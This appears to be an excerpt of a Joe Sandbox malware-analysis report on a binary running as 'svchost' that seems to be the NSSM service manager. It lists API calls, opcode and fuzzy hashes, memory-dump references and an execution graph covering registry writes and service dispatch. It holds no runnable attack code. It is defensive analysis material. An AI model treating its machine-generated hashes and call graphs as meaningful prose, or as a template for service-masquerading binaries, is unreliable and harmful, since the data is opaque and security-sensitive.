                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: AuthorityFreeMemory
                                                    • String ID:
                                                    • API String ID: 1444650384-0
                                                    • Opcode ID: b8e15b337b3f1d921b3dea5c82a8250e1428588c6ab68d38df7715d8a68ab994
                                                    • Instruction ID: 83e81ec0094bd32f467672ea939adaeb78c7e9f3249d369c250e79b353d34dd7
                                                    • Opcode Fuzzy Hash: b8e15b337b3f1d921b3dea5c82a8250e1428588c6ab68d38df7715d8a68ab994
                                                    • Instruction Fuzzy Hash: 81110675A043406FC310EB61C88596BB7E5FF89318F40093DF98997361D638DD91CB99
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00405699
                                                    • GetDesktopWindow.USER32 ref: 0040569F
                                                    • GetWindowRect.USER32(00000000,?), ref: 004056AF
                                                    • MoveWindow.USER32(?,?,?,00000000,?,00000000), ref: 004056E6
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Window$Rect$DesktopMove
                                                    • String ID:
                                                    • API String ID: 2894293738-0
                                                    • Opcode ID: 3fd5e5817b5a9b80783906beb4d0b9204ab218456916bf9286cc18b0c0424074
                                                    • Instruction ID: 4404551d088f54b3b346c67006461702cb67daa45ea7307cd0df8ea8ccbf729a
                                                    • Opcode Fuzzy Hash: 3fd5e5817b5a9b80783906beb4d0b9204ab218456916bf9286cc18b0c0424074
                                                    • Instruction Fuzzy Hash: D5014FB1604212ABD704CE7CDD44EAFBBEDEBC8640F48492DB854D3284DB34E8058BA6
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,00000002,?,?,?,?,00000000), ref: 0040888F
                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 004088A2
                                                    • SetEndOfFile.KERNEL32(00000000), ref: 004088AE
                                                    • GetLastError.KERNEL32(00000000), ref: 004088BB
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: File$CreateErrorLastPointer
                                                    • String ID:
                                                    • API String ID: 2723331319-0
                                                    • Opcode ID: 4e0b794f19faba63de2e6a99d64c6716e3658fd301ade40050abe0956df1ca94
                                                    • Instruction ID: 5390559d92aa947b9314eb53a18356e94adec141a5a2c230ab48a642764cfde5
                                                    • Opcode Fuzzy Hash: 4e0b794f19faba63de2e6a99d64c6716e3658fd301ade40050abe0956df1ca94
                                                    • Instruction Fuzzy Hash: DBF0C8B66046107FE2109758AC0AF9F7768DFC4B24F50C539FA05E62D1D774DC4186BA
                                                    APIs
                                                    • GetDlgItem.USER32(00000000), ref: 0040587D
                                                    • SendMessageW.USER32(00000000,?,0000000E,00000000), ref: 00405884
                                                    • GetDlgItemTextW.USER32(00000000), ref: 00405898
                                                      • Part of subcall function 004054A0: MessageBoxW.USER32(00000000,The message which was supposed to go here is missing!,NSSM,00000030), ref: 004054E4
                                                    • _memset.LIBCMT ref: 004058BF
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ItemMessage$SendText_memset
                                                    • String ID:
                                                    • API String ID: 106090685-0
                                                    • Opcode ID: 6c1f17a3ed959549f23045dc7471758394cc86d8812c56315956d8aff6da2db9
                                                    • Instruction ID: cb56df8b7445a31a75e8c4718e41db6c747a4df5fb1419ea8052b39527e82588
                                                    • Opcode Fuzzy Hash: 6c1f17a3ed959549f23045dc7471758394cc86d8812c56315956d8aff6da2db9
                                                    • Instruction Fuzzy Hash: A2F0A7B17003007BE120AB61DC8DF573B6CDF44B45F40441D7904D61D1D67CE900CE29
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,00070510,?,00406684), ref: 0040D958
                                                    • HeapAlloc.KERNEL32(00000000,?,00406684), ref: 0040D95F
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$HeapSource$AllocDeregisterProcessRegisterReport
                                                    • String ID: alloc_nssm_service()$service
                                                    • API String ID: 1868725766-2157636798
                                                    • Opcode ID: 8ea0d5565f999da2896c2c36d03efb47440df890c0c9d5ffe8b582c93dbb814f
                                                    • Instruction ID: 2c9525e28b5191ed34799dbcc002321da452954f880f3acf974e46df2d9dfe00
                                                    • Opcode Fuzzy Hash: 8ea0d5565f999da2896c2c36d03efb47440df890c0c9d5ffe8b582c93dbb814f
                                                    • Instruction Fuzzy Hash: FAD05EF5E8062027D61222A87C0AFDB25089750B56F528A71BE18F62C2D5A8884046AC
                                                    APIs
                                                    • GetDlgItemTextW.USER32(?,000003ED,00000002,00000100), ref: 004067EA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ItemText
                                                    • String ID: remove()$service
                                                    • API String ID: 3367045223-1317115628
                                                    • Opcode ID: cc42bf898366cd54f4183dcd42ca600010007e7b9bb62e5b1c9b9d6a06996358
                                                    • Instruction ID: 8184d59d72f0fbf905fa053582e3628f82c79463e423cb7eee217312d63cbccc
                                                    • Opcode Fuzzy Hash: cc42bf898366cd54f4183dcd42ca600010007e7b9bb62e5b1c9b9d6a06996358
                                                    • Instruction Fuzzy Hash: B021DEB3A4451032E112319DBC82FEF9258CB9076DF84803BF208F91C6E73D5A91419E
                                                    APIs
                                                    • __snwprintf_s.LIBCMT ref: 0040877C
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$Source$DeregisterRegisterReport__snwprintf_s__vsnwprintf_s_l
                                                    • String ID: %s%s$set_createfile_parameter()
                                                    • API String ID: 2445375048-102671490
                                                    • Opcode ID: 28d182d9b054d50c6284244cab05a53826a641f1a040c1f726e585f693a11305
                                                    • Instruction ID: 3394c9dda24fa343ec2156a0d0e2bb01f682d842124ecdf63034fec8dba4f21e
                                                    • Opcode Fuzzy Hash: 28d182d9b054d50c6284244cab05a53826a641f1a040c1f726e585f693a11305
                                                    • Instruction Fuzzy Hash: 9701B1B26142002BD300A7598C42FAFB3E8ABC4314F80041EF515972C1F5B8A59587D7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LocalSystem
                                                    • API String ID: 0-3718507506
                                                    • Opcode ID: 2781d35c690fc2a676cfbd0f3a4b98b4639caa1f8c1be83308235997636d1291
                                                    • Instruction ID: 9109e31f7caa357bacc1ff475e9021cac7f2486fa8cfe9e055bed6058de38d4d
                                                    • Opcode Fuzzy Hash: 2781d35c690fc2a676cfbd0f3a4b98b4639caa1f8c1be83308235997636d1291
                                                    • Instruction Fuzzy Hash: BFF0B477B001206BDA105A55AC00BDBA3AC9B847A7F14003FF901E31E1E77C994282E9

                                                    Execution Graph

                                                    Execution Coverage:16.6%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:32
                                                    execution_graph 11920 40a9c0 11921 412731 __snwprintf_s 101 API calls 11920->11921 11922 40a9ff 11921->11922 11923 40aa06 11922->11923 11924 40aa3c RegCreateKeyExW 11922->11924 11925 405400 3 API calls 11923->11925 11926 40aa67 GetLastError 11924->11926 11927 40aaa8 11924->11927 11928 40aa1e 11925->11928 11929 4052c0 107 API calls 11926->11929 11930 40aab9 RegCloseKey 11927->11930 11934 40aadb RegSetValueExW 11927->11934 11931 412cdc __fputwc_nolock 5 API calls 11928->11931 11932 40aa75 11929->11932 11939 412cdc __fputwc_nolock 5 API calls 11930->11939 11935 40aa35 11931->11935 11936 405400 3 API calls 11932->11936 11934->11930 11937 40aafa GetLastError 11934->11937 11938 40aa8a 11936->11938 11941 4052c0 107 API calls 11937->11941 11942 412cdc __fputwc_nolock 5 API calls 11938->11942 11940 40ab62 11939->11940 11943 40ab08 11941->11943 11944 40aaa1 11942->11944 11945 405400 3 API calls 11943->11945 11946 40ab1d RegCloseKey 11945->11946 11947 412cdc __fputwc_nolock 5 API calls 11946->11947 11948 40ab3f 11947->11948 11949 413d02 11950 413d0e __mtinitlocknum 11949->11950 11993 418b0c HeapCreate 11950->11993 11953 413d6b 12172 41657a GetModuleHandleW 11953->12172 11956 413d71 11957 413d75 11956->11957 11958 413d7d __RTC_Initialize 11956->11958 11959 413cd9 _fast_error_exit 67 API calls 11957->11959 11995 413e5d 11958->11995 11960 413d7c 11959->11960 11960->11958 11962 413d8b 11963 413d97 GetCommandLineW 11962->11963 11964 413d8f 11962->11964 12010 418aaf GetEnvironmentStringsW 11963->12010 11965 4136a9 __amsg_exit 67 API calls 11964->11965 11967 413d96 11965->11967 11967->11963 11968 413da6 12205 418a01 GetModuleFileNameW 11968->12205 11970 413db0 11971 413db4 11970->11971 11972 413dbc 11970->11972 11973 4136a9 __amsg_exit 67 API calls 11971->11973 12016 4187d2 11972->12016 11975 413dbb 11973->11975 11975->11972 11977 413dc5 11979 4136a9 __amsg_exit 67 API calls 11977->11979 11978 413dcd 12028 413768 11978->12028 11981 413dcc 11979->11981 11981->11978 11982 413dd4 11983 413de0 11982->11983 11984 413dd9 11982->11984 12034 409b70 11983->12034 11985 4136a9 __amsg_exit 67 API calls 11984->11985 11987 413ddf 11985->11987 11987->11983 11994 413d5f 11993->11994 11994->11953 12164 413cd9 11994->12164 12209 416a78 11995->12209 11997 413e69 GetStartupInfoA 11998 4140f6 __calloc_crt 67 API calls 11997->11998 12006 413e8a 11998->12006 11999 4140a8 __mtinitlocknum 11999->11962 12000 414025 GetStdHandle 12005 413fef 12000->12005 12001 41408a SetHandleCount 12001->11999 12002 4140f6 __calloc_crt 67 API calls 12002->12006 12003 414037 GetFileType 12003->12005 12004 413f72 12004->11999 12004->12005 12007 413f9b GetFileType 12004->12007 12009 418527 __mtinitlocknum InitializeCriticalSectionAndSpinCount 12004->12009 12005->11999 12005->12000 12005->12001 12005->12003 12008 418527 __mtinitlocknum InitializeCriticalSectionAndSpinCount 12005->12008 12006->11999 12006->12002 12006->12004 12006->12005 12007->12004 12008->12005 12009->12004 12011 418ac0 12010->12011 12012 418ac4 12010->12012 12011->11968 12013 4140b1 __malloc_crt 67 API calls 12012->12013 12014 418ae5 _realloc 12013->12014 12015 418aec FreeEnvironmentStringsW 12014->12015 12015->11968 12017 4187ea _wcslen 12016->12017 12021 413dc1 12016->12021 12018 4140f6 __calloc_crt 67 API calls 12017->12018 12026 41880e _wcslen 12018->12026 12019 418873 12020 414190 __mtinitlocknum 67 API calls 12019->12020 12020->12021 12021->11977 12021->11978 12022 4140f6 __calloc_crt 67 API calls 12022->12026 12023 418899 12024 414190 __mtinitlocknum 67 API calls 12023->12024 12024->12021 12026->12019 12026->12021 12026->12022 12026->12023 12210 41be80 12026->12210 12219 415360 12026->12219 12030 413776 __IsNonwritableInCurrentImage 12028->12030 12228 417fc1 12030->12228 12031 413794 __initterm_e 12033 4137b3 __IsNonwritableInCurrentImage __initterm 12031->12033 12232 417f5e 12031->12232 12033->11982 12371 401a00 GetConsoleWindow 12034->12371 12036 409b78 __flswbuf 12037 413b64 __fileno 67 API calls 12036->12037 12038 409b8b 12037->12038 12376 413a6d 12038->12376 12040 409b94 __flswbuf 12041 413b64 __fileno 67 API calls 12040->12041 12042 409baa 12041->12042 12043 413a6d __setmode 69 API calls 12042->12043 12044 409bb3 12043->12044 12395 409920 AllocateAndInitializeSid 12044->12395 12048 409bc0 12049 409bcb 12048->12049 12050 413919 67 API calls 12048->12050 12051 409eb0 TlsAlloc 12049->12051 12054 4097b0 79 API calls 12049->12054 12050->12049 12052 409ec4 12051->12052 12053 409ec9 GetStdHandle 12051->12053 12419 40a860 12052->12419 12055 409ed5 StartServiceCtrlDispatcherW 12053->12055 12056 409f0b 12053->12056 12058 409bf1 12054->12058 12059 409f41 12055->12059 12060 409efe GetLastError 12055->12060 12693 4098d0 GetConsoleWindow 12056->12693 12062 409c10 12058->12062 12063 409bf8 12058->12063 12068 413919 67 API calls 12059->12068 12060->12056 12065 409f1b 12060->12065 12067 4097b0 79 API calls 12062->12067 12441 40ef10 12063->12441 12073 4052c0 107 API calls 12065->12073 12066 409f12 12071 413919 67 API calls 12066->12071 12072 409c1d 12067->12072 12069 409f47 12068->12069 12070 409c07 12074 413919 67 API calls 12070->12074 12071->12065 12075 409c24 12072->12075 12076 409c3c 12072->12076 12077 409f22 12073->12077 12074->12062 12078 40ef10 164 API calls 12075->12078 12080 4097b0 79 API calls 12076->12080 12079 405400 3 API calls 12077->12079 12081 409c33 12078->12081 12082 409f32 12079->12082 12083 409c49 12080->12083 12084 413919 67 API calls 12081->12084 12085 408480 2 API calls 12082->12085 12086 409c50 12083->12086 12087 409c7e 12083->12087 12084->12076 12089 409f3a 12085->12089 12090 40ef10 164 API calls 12086->12090 12088 4097b0 79 API calls 12087->12088 12091 409c8b 12088->12091 12092 413919 67 API calls 12089->12092 12093 409c5f 12090->12093 12095 409c92 12091->12095 12096 409caa 12091->12096 12092->12059 12094 409c6c 12093->12094 12097 413919 67 API calls 12093->12097 12098 40ef10 164 API calls 12094->12098 12099 40ef10 164 API calls 12095->12099 12100 4097b0 79 API calls 12096->12100 12097->12094 12101 409c75 12098->12101 12102 409ca1 12099->12102 12103 409cb7 12100->12103 12106 413919 67 API calls 12101->12106 12107 413919 67 API calls 12102->12107 12104 409cd6 12103->12104 12105 409cbe 12103->12105 12109 4097b0 79 API calls 12104->12109 12108 40ef10 164 API calls 12105->12108 12106->12087 12107->12096 12110 409ccd 12108->12110 12111 409ce3 12109->12111 12112 413919 67 API calls 12110->12112 12113 409d02 12111->12113 12114 409cea 12111->12114 12112->12104 12116 4097b0 79 API calls 12113->12116 12115 40ef10 164 API calls 12114->12115 12117 409cf9 12115->12117 12118 409d0f 12116->12118 12119 413919 67 API calls 12117->12119 12120 409d31 12118->12120 12121 409d16 12118->12121 12119->12113 12122 4097b0 79 API calls 12120->12122 12123 40ef10 164 API calls 12121->12123 12125 409d3e 12122->12125 12124 409d28 12123->12124 12126 413919 67 API calls 12124->12126 12127 409d78 12125->12127 12128 409d62 12125->12128 12129 409d4e 12125->12129 12126->12120 12130 4097b0 79 API calls 12127->12130 12518 40fee0 12128->12518 12499 4099a0 12129->12499 12131 409d85 12130->12131 12134 409e2f 12131->12134 12137 4097b0 79 API calls 12131->12137 12564 40daa0 12134->12564 12141 409d9d 12137->12141 12141->12134 12142 4097b0 79 API calls 12141->12142 12143 409db5 12142->12143 12143->12134 12165 413ce7 12164->12165 12166 413cec 12164->12166 12167 417dfe __FF_MSGBANNER 67 API calls 12165->12167 12168 417c53 __NMSG_WRITE 67 API calls 12166->12168 12167->12166 12169 413cf4 12168->12169 12170 4136fd __mtinitlocknum 3 API calls 12169->12170 12171 413cfe 12170->12171 12171->11953 12173 416594 12172->12173 12174 41658e 12172->12174 12176 4166fd 12173->12176 12177 41659f GetProcAddress GetProcAddress GetProcAddress GetProcAddress 12173->12177 12175 413679 __crt_waiting_on_module_handle 2 API calls 12174->12175 12175->12173 13853 416294 12176->13853 12178 4165e8 TlsAlloc 12177->12178 12181 416702 12178->12181 12182 416636 TlsSetValue 12178->12182 12181->11956 12182->12181 12183 416647 12182->12183 13842 413963 12183->13842 12186 41616a __encode_pointer 6 API calls 12187 416657 12186->12187 12188 41616a __encode_pointer 6 API calls 12187->12188 12189 416667 12188->12189 12190 41616a __encode_pointer 6 API calls 12189->12190 12191 416677 12190->12191 12192 41616a __encode_pointer 6 API calls 12191->12192 12193 416687 12192->12193 13849 414450 12193->13849 12196 4161e5 __decode_pointer 6 API calls 12197 4166a8 12196->12197 12197->12176 12198 4140f6 __calloc_crt 67 API calls 12197->12198 12199 4166c1 12198->12199 12199->12176 12200 4161e5 __decode_pointer 6 API calls 12199->12200 12201 4166db 12200->12201 12201->12176 12202 4166e2 12201->12202 12203 4162d1 __initptd 67 API calls 12202->12203 12204 4166ea GetCurrentThreadId 12203->12204 12204->12181 12207 418a36 _wparse_cmdline 12205->12207 12206 418a79 _wparse_cmdline 12206->11970 12207->12206 12208 4140b1 __malloc_crt 67 API calls 12207->12208 12208->12206 12209->11997 12211 41be91 12210->12211 12212 41be98 12210->12212 12211->12212 12217 41bec4 12211->12217 12213 4154f0 __lseeki64_nolock 67 API calls 12212->12213 12214 41be9d 12213->12214 12215 415488 __setmode 6 API calls 12214->12215 12216 41beac 12215->12216 12216->12026 12217->12216 12218 4154f0 __lseeki64_nolock 67 API calls 12217->12218 12218->12214 12226 412d20 12219->12226 12221 41538d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12222 415469 GetCurrentProcess TerminateProcess 12221->12222 12223 41545d __invoke_watson 12221->12223 12224 412cdc __fputwc_nolock 5 API calls 12222->12224 12223->12222 12225 415486 12224->12225 12225->12026 12227 412d2c __VEC_memzero 12226->12227 12227->12221 12229 417fc7 12228->12229 12231 417fdf 12229->12231 12235 41616a TlsGetValue 12229->12235 12231->12031 12245 417f22 12232->12245 12234 417f6b 12234->12033 12236 4161a3 GetModuleHandleW 12235->12236 12237 416182 12235->12237 12239 4161b3 12236->12239 12240 4161be GetProcAddress 12236->12240 12237->12236 12238 41618c TlsGetValue 12237->12238 12242 416197 12238->12242 12241 413679 __crt_waiting_on_module_handle 2 API calls 12239->12241 12244 41619b 12240->12244 12243 4161b9 12241->12243 12242->12236 12242->12244 12243->12240 12243->12244 12244->12229 12246 417f2e __mtinitlocknum 12245->12246 12253 413715 12246->12253 12252 417f4f __mtinitlocknum 12252->12234 12254 4145cc __lock 67 API calls 12253->12254 12255 41371c 12254->12255 12256 417e37 12255->12256 12257 4161e5 __decode_pointer 6 API calls 12256->12257 12258 417e4b 12257->12258 12259 4161e5 __decode_pointer 6 API calls 12258->12259 12260 417e5b 12259->12260 12261 417ede 12260->12261 12276 41bcbd 12260->12276 12273 417f58 12261->12273 12263 41616a __encode_pointer 6 API calls 12266 417ed3 12263->12266 12264 417e9d 12264->12261 12269 414142 __realloc_crt 73 API calls 12264->12269 12270 417eb3 12264->12270 12265 417e79 12265->12264 12272 417ec5 12265->12272 12289 414142 12265->12289 12268 41616a __encode_pointer 6 API calls 12266->12268 12268->12261 12269->12270 12270->12261 12271 41616a __encode_pointer 6 API calls 12270->12271 12271->12272 12272->12263 12367 41371e 12273->12367 12277 41bcc9 __mtinitlocknum 12276->12277 12278 41bcf6 12277->12278 12279 41bcd9 12277->12279 12281 41bd37 HeapSize 12278->12281 12284 4145cc __lock 67 API calls 12278->12284 12280 4154f0 __lseeki64_nolock 67 API calls 12279->12280 12283 41bcde 12280->12283 12282 41bcee __mtinitlocknum 12281->12282 12282->12265 12285 415488 __setmode 6 API calls 12283->12285 12286 41bd06 ___sbh_find_block 12284->12286 12285->12282 12294 41bd57 12286->12294 12292 41414b 12289->12292 12291 41418a 12291->12264 12292->12291 12293 41416b Sleep 12292->12293 12298 418e09 12292->12298 12293->12292 12297 4144f2 LeaveCriticalSection 12294->12297 12296 41bd32 12296->12281 12296->12282 12297->12296 12299 418e15 __mtinitlocknum 12298->12299 12300 418e2a 12299->12300 12301 418e1c 12299->12301 12302 418e31 12300->12302 12303 418e3d 12300->12303 12334 418c21 12301->12334 12305 414190 __mtinitlocknum 67 API calls 12302->12305 12311 418faf 12303->12311 12322 418e4a ___sbh_resize_block _realloc ___sbh_find_block 12303->12322 12306 418e24 _realloc __mtinitlocknum 12305->12306 12306->12292 12307 418fe2 12308 418596 _malloc 6 API calls 12307->12308 12312 418fe8 12308->12312 12309 4145cc __lock 67 API calls 12309->12322 12310 418fb4 HeapReAlloc 12310->12306 12310->12311 12311->12307 12311->12310 12313 419006 12311->12313 12315 418596 _malloc 6 API calls 12311->12315 12317 418ffc 12311->12317 12314 4154f0 __lseeki64_nolock 67 API calls 12312->12314 12313->12306 12316 4154f0 __lseeki64_nolock 67 API calls 12313->12316 12314->12306 12315->12311 12318 41900f GetLastError 12316->12318 12320 4154f0 __lseeki64_nolock 67 API calls 12317->12320 12318->12306 12333 418f7d 12320->12333 12321 418ed5 HeapAlloc 12321->12322 12322->12306 12322->12307 12322->12309 12322->12321 12324 418f2a HeapReAlloc 12322->12324 12325 419803 ___sbh_alloc_block 5 API calls 12322->12325 12326 418f95 12322->12326 12327 418596 _malloc 6 API calls 12322->12327 12328 419054 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 12322->12328 12330 418f78 12322->12330 12351 418f4d 12322->12351 12323 418f82 GetLastError 12323->12306 12324->12322 12325->12322 12326->12306 12329 4154f0 __lseeki64_nolock 67 API calls 12326->12329 12327->12322 12328->12322 12331 418fa2 12329->12331 12332 4154f0 __lseeki64_nolock 67 API calls 12330->12332 12331->12306 12331->12318 12332->12333 12333->12306 12333->12323 12335 418cd4 12334->12335 12344 418c33 12334->12344 12336 418596 _malloc 6 API calls 12335->12336 12337 418cda 12336->12337 12339 4154f0 __lseeki64_nolock 66 API calls 12337->12339 12338 417dfe __FF_MSGBANNER 66 API calls 12338->12344 12350 418ccc 12339->12350 12341 417c53 __NMSG_WRITE 66 API calls 12341->12344 12342 418c90 HeapAlloc 12342->12344 12343 4136fd __mtinitlocknum 3 API calls 12343->12344 12344->12338 12344->12341 12344->12342 12344->12343 12345 418cc0 12344->12345 12347 418596 _malloc 6 API calls 12344->12347 12348 418cc5 12344->12348 12344->12350 12354 418bd2 12344->12354 12346 4154f0 __lseeki64_nolock 66 API calls 12345->12346 12346->12348 12347->12344 12349 4154f0 __lseeki64_nolock 66 API calls 12348->12349 12349->12350 12350->12306 12366 4144f2 LeaveCriticalSection 12351->12366 12353 418f54 12353->12322 12355 418bde __mtinitlocknum 12354->12355 12356 418c0f __mtinitlocknum 12355->12356 12357 4145cc __lock 67 API calls 12355->12357 12356->12344 12358 418bf4 12357->12358 12359 419803 ___sbh_alloc_block 5 API calls 12358->12359 12360 418bff 12359->12360 12362 418c18 12360->12362 12365 4144f2 LeaveCriticalSection 12362->12365 12364 418c1f 12364->12356 12365->12364 12366->12353 12370 4144f2 LeaveCriticalSection 12367->12370 12369 413725 12369->12252 12370->12369 12372 401a2b 12371->12372 12373 401a0b GetWindowThreadProcessId 12371->12373 12372->12036 12373->12372 12374 401a1a GetCurrentProcessId 12373->12374 12374->12372 12375 401a25 FreeConsole 12374->12375 12375->12372 12378 413a79 __mtinitlocknum 12376->12378 12377 413ac1 12379 413ad6 12377->12379 12380 413ac9 12377->12380 12378->12377 12384 413a9f 12378->12384 12381 413ae4 12379->12381 12385 413b11 12379->12385 12382 4154f0 __lseeki64_nolock 67 API calls 12380->12382 12383 4154f0 __lseeki64_nolock 67 API calls 12381->12383 12391 413ab6 __mtinitlocknum 12382->12391 12388 413aa4 12383->12388 12386 4154f0 __lseeki64_nolock 67 API calls 12384->12386 12387 4186bb ___lock_fhandle 68 API calls 12385->12387 12386->12388 12389 413b17 12387->12389 12390 415488 __setmode 6 API calls 12388->12390 12392 4154f0 __lseeki64_nolock 67 API calls 12389->12392 12393 413b24 __setmode_nolock 12389->12393 12390->12391 12391->12040 12392->12393 12700 413b5a 12393->12700 12396 409973 CheckTokenMembership FreeSid 12395->12396 12397 40998f 12395->12397 12396->12397 12398 412cdc __fputwc_nolock 5 API calls 12397->12398 12399 40999b 12398->12399 12400 408310 12399->12400 12704 408200 LoadLibraryW 12400->12704 12403 4083c8 12404 4083da 12403->12404 12406 408200 112 API calls 12403->12406 12404->12048 12408 408400 12406->12408 12411 40844b 12408->12411 12412 408250 120 API calls 12408->12412 12409 40837d 12409->12048 12410 408250 120 API calls 12413 408398 12410->12413 12411->12048 12414 40841c 12412->12414 12415 408250 120 API calls 12413->12415 12416 4083aa 12413->12416 12417 408250 120 API calls 12414->12417 12418 40842e 12414->12418 12415->12403 12416->12048 12417->12411 12418->12048 12420 40a86a __write_nolock 12419->12420 12421 412731 __snwprintf_s 101 API calls 12420->12421 12422 40a893 12421->12422 12423 40a89c 12422->12423 12424 40a8cf RegCreateKeyExW 12422->12424 12425 405400 3 API calls 12423->12425 12426 40a935 GetModuleFileNameW 12424->12426 12427 40a8f5 GetLastError 12424->12427 12429 40a8b2 12425->12429 12428 40a954 